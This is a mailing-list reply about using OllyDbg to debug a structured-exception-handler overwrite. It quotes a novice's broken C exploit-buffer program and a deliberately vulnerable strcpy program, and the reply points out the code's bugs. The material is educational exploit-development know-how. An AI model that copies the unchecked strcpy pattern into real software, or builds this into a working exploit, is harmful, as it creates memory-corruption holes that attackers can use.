Re: debugging seh overwrite

[The Jabberwock <dj () ethericmist net>]

I've never seen anyone use this method for filling a buffer, but:

I don't see the variable "ret" declared anywhere in your code. I just 
see it used in the call to memcpy.
sizeof(payload) might not be the best way to get the string length of 
the payload. It may be safer to use strlnlen. There is no guarantee that 
sizeof(char[84]) will return the length of the string as opposed to 
sizeof(char).

You also seem to be misusing your `ptr` variable.

I recommend you read "Smashing the Stack for Fun and Profit":
http://www.phrack.org/show.php?p=49&a=14


The Jabberwock
http://www.tenebrous.com/



laphoo () gmail com wrote:
> Hello, I would like to know a way to debugging a vulnerable program, where I am overwriting the se handler with my 
> address. I have OllyDbg as just in time debugger. If my exploit-buffer reaches the pointer to the next seh record, 
> nothing happens. Now I was trying to put breakpoint instructions 0xcc) as fake pointer but OllyDbg ignored them, or I 
> did something wrong. How is it possible to debug my vulnerable program with OllyDbg, to see where and with which data I 
> overwrote something?
>
> /* cl expl.c (Visual C++ 6.0) */
> #include <stdio.h>
> #include <string.h>
> int main (void)
> {
>     char *app[3];
>     char payload[84];
>     unsigned int ptr = 0xcccccccc;
>     memset(payload, 0x00, sizeof payload);
>     memset(payload, 0x41, 80);
>     memcpy(payload+80, &ret, sizeof (int));
>     app[0] = "vuln.exe";
>     app[1] = payload;
>     app[2] = NULL;
>     execve(app[0], app, NULL);
>     return 0;
> }
>
>
> /*vuln.c /
> #include <stdio.h>
> #include <string.h>
> int main (int argc, char *argv[])
> {
>     char string[32];
>     if (argc > 2)
>     {
>         printf("Usage: %s <string>\n", argv[0]);
>         return 0;
>     }
>     strcpy(string, argv[1]);
>     printf("%s", string);
>     return 0;
> }
>
> Environment is Windows.XP.SP.2
>
> I am sorry for my bad english.
>
> Regards,
> -- Laphoo
>
>